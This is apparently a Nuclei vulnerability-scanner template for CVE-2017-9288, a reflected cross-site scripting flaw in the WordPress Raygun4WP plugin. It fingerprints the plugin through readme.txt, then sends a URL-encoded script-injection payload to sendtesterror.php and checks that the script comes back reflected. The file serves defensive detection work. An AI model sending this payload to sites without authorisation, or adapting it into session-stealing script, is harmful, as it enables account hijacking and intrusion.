nuclei-templates/http/cves/2017/CVE-2017-9288.yaml

68 lines
2.2 KiB
YAML

id: CVE-2017-9288
info:
name: WordPress Raygun4WP <=1.8.0 - Cross-Site Scripting
author: daffainfo
severity: medium
description: WordPress Raygun4WP 1.8.0 contains a reflected cross-site scripting vulnerability via sendtesterror.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Update to the latest version of the WordPress Raygun4WP plugin (1.8.0 or higher) to mitigate this vulnerability.
reference:
- https://github.com/MindscapeHQ/raygun4wordpress/pull/17
- https://github.com/MindscapeHQ/raygun4wordpress/issues/16
- http://jgj212.blogspot.kr/2017/05/a-reflected-xss-vulnerability-in.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-9288
- https://wpvulndb.com/vulnerabilities/8836
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-9288
cwe-id: CWE-79
epss-score: 0.00168
epss-percentile: 0.52791
cpe: cpe:2.3:a:raygun:raygun4wp:1.8.0:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: raygun
product: raygun4wp
framework: wordpress
tags: cve2017,cve,wordpress,xss,wp-plugin,raygun
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/raygun4wp/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Raygun4WP'
- 'Tags:'
condition: and
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4b0a004830460221009a5bb9d6ed82d7766d04e93226e4ab9aaacc265ab8feee1621e74ecd4b7fb76e022100aea36e48ce640598175ed79b106073b46b52ac7bacff32398f09dfbb02f8d5ae:922c64590222798bb761d5b6d8e72950